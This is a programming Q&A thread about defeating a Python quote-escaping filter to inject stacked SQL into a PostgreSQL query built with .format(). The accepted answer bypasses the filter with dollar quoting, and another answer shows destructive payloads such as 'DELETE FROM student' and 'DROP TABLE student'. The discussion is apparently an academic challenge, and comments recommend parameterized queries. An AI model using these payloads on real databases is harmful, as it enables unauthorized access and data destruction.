# How to exploit Python code escape string for SQLInjection in PostgreSQL

Tags: python, sql, postgresql

Is there any way to exploit this code:

```
course = course.replace('\'', '\\\'')
query = "SELECT * FROM student WHERE cost_per_unit > {}".format(course)
```

to create a query like:
`SELECT * FROM student WHERE cost_per_unit > 3; SELECT * FROM student WHERE column = 'ABC'`

Here, Python throws a syntax error:

```
Syntax error at or near "\":
column = \'ABC\'
```

The `replace()` method in python replaces that. Is there any work-around so I can somehow inject something?

Comment: You don't use `.format()` on SQL queries. Give the query arguments as a sequnce to the `.execute()` method as described in the [documentation](http://initd.org/psycopg/docs/usage.html#query-parameters).

Comment: @KlausD. I am afraid the code is not editable. I can just edit the value of string `course`

Comment: That's awful suspicious

Comment: @th0nk- lol. it's academic of course

Comment: Alright well regardless of your seemingly dubious intentions ;) keep in mind that Postgres doesn't treat backslashes as escape characters outside of `LIKE` expressions, so the syntax going between the two is not compatible the way this is handled

Comment: @th0nk- the string comparison is still the problem and that's the challenge

Answer (score 1, accepted):

**SOLUTION**

Since I have to compare strings, and I cannot use `'` because the `replace()` messes it up, I used `$` [dollar quoting](https://www.postgresql.org/docs/current/sql-syntax-lexical.html#SQL-SYNTAX-DOLLAR-QUOTING)

So the `course` looked like
`3; SELECT * FROM student WHERE column = $$ABC$$`

Answer (score 0):

if `course` is `"3; SELECT * FROM student WHERE column = 'ABC'"` I don't get any syntax errors but the result might not work as valid SQL:

```
>>> def a(course):
...     course = course.replace('\'', '\\\'')
...     query = "SELECT * FROM student WHERE cost_per_unit > {}".format(course)
...     return query
...
>>> a("3; SELECT * FROM student WHERE column = 'ABC'")
"SELECT * FROM student WHERE cost_per_unit > 3; SELECT * FROM student WHERE column = \\'ABC\\'"
```

But the code is indeed very exploitable if other queries are possible. For this example would work just fine:

```
>>> a("3; SELECT * FROM student")
'SELECT * FROM student WHERE cost_per_unit > 3; SELECT * FROM student'
```

And so would these dangerous ones:

```
>>> a("3; DELETE FROM student")
'SELECT * FROM student WHERE cost_per_unit > 3; DELETE FROM student'
>>> a("DROP TABLE student")
'SELECT * FROM student WHERE cost_per_unit > DROP TABLE student'
```

Comment: The string comparison is definitely necessary in this case. It should work fine for other queries. I wonder if there is any way to somehow I can compare the string without using the quotations.

Comment: PostreSQL doesn't support `"` instead of `'`.

Comment: @SakshamChawla sorry that's all i've got

Comment: "if course is "3; SELECT * FROM student WHERE column = 'ABC'" I don't get any syntax errors but the result might not work as valid SQL:"  Right.  The python syntax is valid, it is the SQL syntax which has the error.